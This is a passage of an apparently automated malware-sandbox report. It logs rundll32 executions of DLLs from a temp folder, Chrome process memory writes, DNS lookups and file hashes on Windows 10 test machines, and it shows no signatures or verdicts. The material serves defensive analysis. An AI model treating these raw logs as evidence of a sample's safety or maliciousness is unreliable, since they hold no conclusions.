PID 4372 wrote to memory of 1232 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 1232 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 1232 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 1232 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 1232 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 1232 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 1232 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 1232 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 1232 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 1232 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 1232 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 1232 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 1232 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 1232 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 1232 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 1232 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 1232 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 1232 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 1232 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 1232 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 1232 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 1232 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 1232 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 1232 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 1232 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 4636 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 4636 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 2096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\vcruntime140.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\vcruntime140.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3500 -ip 3500

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3500 -s 600

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff8d7daab58,0x7ff8d7daab68,0x7ff8d7daab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1708 --field-trial-handle=2120,i,17991815377031308736,14497858326214582523,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1932 --field-trial-handle=2120,i,17991815377031308736,14497858326214582523,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2160 --field-trial-handle=2120,i,17991815377031308736,14497858326214582523,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3088 --field-trial-handle=2120,i,17991815377031308736,14497858326214582523,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3100 --field-trial-handle=2120,i,17991815377031308736,14497858326214582523,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4328 --field-trial-handle=2120,i,17991815377031308736,14497858326214582523,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4636 --field-trial-handle=2120,i,17991815377031308736,14497858326214582523,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4796 --field-trial-handle=2120,i,17991815377031308736,14497858326214582523,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --reenable-autoupdates --system-level

C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x25c,0x260,0x264,0x238,0x268,0x7ff6c930ae48,0x7ff6c930ae58,0x7ff6c930ae68

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4280 --field-trial-handle=2120,i,17991815377031308736,14497858326214582523,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3064 --field-trial-handle=2120,i,17991815377031308736,14497858326214582523,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3112 --field-trial-handle=2120,i,17991815377031308736,14497858326214582523,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4792 --field-trial-handle=2120,i,17991815377031308736,14497858326214582523,131072 /prefetch:1

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
US 8.8.4.4:53 google.com udp
US 8.8.8.8:53 4.4.8.8.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp

Files

\??\pipe\crashpad_4372_JBOTTCNCEEUXGAFE

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 b208bac42091e7f3598d295a0dbb81fa
SHA1 f96593ecf2af0778a180c04849787df0169ee5a2
SHA256 a1050bda124896ed94ecfbcdbcd691c16bbd25a9c8013280bd4760f238e1ed7c
SHA512 e6b40e7ad2f89d6694a92fed6e5434486a05c58987d1a73265e3447af7c40b19e85ca3ac9027957ce0dcf1f9c8139350f855ebf4225878a13686e16e81f9072d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 42bba17d77b247d364621d004b018128
SHA1 f1a3462f021784b6903680cb4721862a93c8b632
SHA256 00d44af8ddfa5d03aea153db29360a9d9b4f0af7101520f306668244c01148aa
SHA512 f4a294858a47ef323a00cd577819467f01a466db87d2b63fa277d3461d4930b037df00aee4192be2ef45495dec8a35ed1e30b4ce46ecdcbe43fdb18a4968abf7

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 a6d19ce20a2a9a1b047278783e315df2
SHA1 2d5d6ff5fffa86cead2f7ac165de04b1f0f5e427
SHA256 0989358f5f9297d6133fe9124c0f69171cfc2a61f6240b9fae5029cceefb787d
SHA512 6baa038a6e177a03d7d72310c77cebf0bac8e46ae2783bda66f34aa7bb319fef93d84f08abb3ac3ec2822e39a993686a43165527717e62eb5468eaac1944ebc8

Analysis: behavioral20

Detonation Overview

Submitted

2024-06-18 17:22

Reported

2024-06-18 17:25

Platform

win10v2004-20240611-en

Max time kernel

92s

Max time network

95s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\x86\api-ms-win-core-profile-l1-1-0.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\x86\api-ms-win-core-profile-l1-1-0.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 105.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 145.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral24

Detonation Overview

Submitted

2024-06-18 17:22

Reported

2024-06-18 17:25

Platform

win10v2004-20240508-en

Max time kernel

51s

Max time network

51s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\x86\api-ms-win-core-synch-l1-2-0.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\x86\api-ms-win-core-synch-l1-2-0.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral28

Detonation Overview

Submitted

2024-06-18 17:22

Reported

2024-06-18 17:25

Platform

win10v2004-20240508-en

Max time kernel

51s

Max time network

51s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\x86\api-ms-win-crt-conio-l1-1-0.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\x86\api-ms-win-crt-conio-l1-1-0.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A